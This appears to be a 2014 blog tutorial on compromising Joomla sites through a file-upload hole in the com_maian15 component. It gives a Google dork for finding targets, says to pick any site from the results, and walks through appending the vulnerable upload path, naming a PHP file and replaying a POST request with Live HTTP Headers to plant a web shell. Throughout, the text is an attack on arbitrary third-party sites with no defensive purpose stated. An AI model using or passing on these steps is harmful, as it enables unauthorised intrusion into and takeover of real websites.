Friday, 21 February 2014

Exploit Joomla: com_maian15




In this tutorial, i'm going to show you how to upload shell using Live Http Header through Joomla component , com_maian15.

Finding Vulnerable Target

Dork : "inurl:option=com_maian15"
  
Exploit:

 /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php? 

Browser: Mozilla Firefox

1- Firstly, copy the dork and paste in google

2- Choose any site

Exploiting Target
  
1-  Paste the exploit at the end of the site URL.

Example:

www.site.com/index.php?option=com_maian15&view=album&album=9

into

www.site.com/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?

2-   If it says,   
      saving your images to ../tmp-upload-images/
      or something similar, it means the site is vulnerable.

3-  Now, add name=yourshellname.php at the end of the site URL

Example:

www.site.com/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=bcc.php

4- Hit enter and you will get something like  
     saving your images to ../tmp-upload-images/bcc.php
   

5- Now, open up your Firefox extension, Live HTTP Header , and refresh the page.

6-  As you can see, in your Live HTTP Header, there is the url of the site. Highlight it and click on replay.


   7- Once you clicked replay, a popup will appear, tick on Send POST Content and paste your shell script in the column. 


8- Click replay , the page will automatically refresh  and your shell is successfully uploaded at

www.site.com/administrator/components/com_maian15/charts/tmp-upload-images/yourshellname.php




That's all the tutorial for today :P Feels free to leave a comment below :D